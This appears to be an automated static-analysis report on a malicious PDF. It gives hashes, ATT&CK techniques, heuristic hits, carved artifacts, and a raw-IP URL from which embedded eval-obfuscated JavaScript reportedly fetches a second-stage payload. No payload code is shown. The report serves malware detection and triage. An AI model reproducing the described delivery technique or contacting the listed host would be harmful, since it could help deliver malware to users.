Malicious PDF — malware analysis report

Static analysis result for SHA-256 33dfee7020b9540d…

MALICIOUS

PDF

1.95 MB Created: 2011-72-51 03:25:00 Authoring application: Writer (via OpenOffice.org 3.0)
MD5: b19065ee00ab89ffbcfaf48fc2828196 SHA-1: 936065771ac438e8a32bdf5d7a7017270ee01437 SHA-256: 33dfee7020b9540dedd6bc6728fe98a7c5c669e38402ba17e2c2e63e46759e45
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript that utilizes eval() to execute obfuscated code. This script is designed to download and execute a second-stage payload from the IP address 172.16.1.10. The combination of JavaScript execution and the direct IP address in the URL strongly suggests a malicious intent to exploit the user. The PDF also exhibits parser evasion techniques, further indicating malicious activity.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9779

Heuristics 8

  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • eval() call high PDF_EVAL
    eval() found — commonly used for obfuscated exploit execution (matched inside decoded stream)
  • Clickable PDF combines external action with parser-evasion structure high PDF_ACTION_PARSER_EVASION
    PDF has an external clickable URI together with object graph or xref structures that make parsers disagree, such as divergent duplicate objects, parser divergence, or xref offset mismatch. That combination is stronger than a plain link: the document is both an outward-action carrier and a parser-confusion/evasion sample.
  • Clickable URI points to raw IP address medium PDF_URI_IP_LITERAL
    PDF contains a clickable HTTP(S) action whose host is a literal IPv4 address. Legitimate documents normally link to named domains; raw-IP destinations are common in disposable phishing and malware-delivery infrastructure.
  • JavaScript action low PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://172.16.1.10/
    • http://172.16.1.10
    • http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlUse
    • http://www.ascendercorp.com/liberation.html

Extracted artifacts 8

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js
1db8460db841eacf06b80da2c08969bf2b2f3adde35b2d0ca91bcb7f6750d6c8		 pdf-javascript-stream PDF /JS object 1 at offset 0x610B 538 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
font_00_sfnt_off0004e31c.bin
77d0fc6988188759e3b29bb709b47e59013d93db4d8e6b458e257a6f6f7a392b		 pdf-font-stream PDF embedded font (sfnt) at offset 0x4E31C 10840 bytes
font_01_sfnt_off000502ff.bin
747e5fe417574fc568eea0a84112eeceb371a1a4dd3b0b702f52ac75e12896ff		 pdf-font-stream PDF embedded font (sfnt) at offset 0x502FF 23748 bytes
font_02_sfnt_off0005451d.bin
62985b917b9ba3e49bb34f6e82f474b8f2850307b1fc1417a51c4781b8f5f7fd		 pdf-font-stream PDF embedded font (sfnt) at offset 0x5451D 46812 bytes
font_03_sfnt_off0005bbd7.bin
798c8b83cefbbbe0ef3343074988772ee8e26ec0a470e4473af4456ed291887a		 pdf-font-stream PDF embedded font (sfnt) at offset 0x5BBD7 34780 bytes
font_04_sfnt_off00061584.bin
c2f214f83e3b7c53a4de47c4c8b7a4299b26e4b7c5c42ae2a5cff30b48a1a474		 pdf-font-stream PDF embedded font (sfnt) at offset 0x61584 21772 bytes
font_05_sfnt_off000651c1.bin
65067a5fb081667384ffa828548e6b993384c6fa15cdfbaf76c8f68f70843c66		 pdf-font-stream PDF embedded font (sfnt) at offset 0x651C1 30596 bytes
font_06_sfnt_off0006a370.bin
7ad3e7562deae03753c97f79cb2a8a39213fd0dbbc04dffce5f13fc4d0a37383		 pdf-font-stream PDF embedded font (sfnt) at offset 0x6A370 24588 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.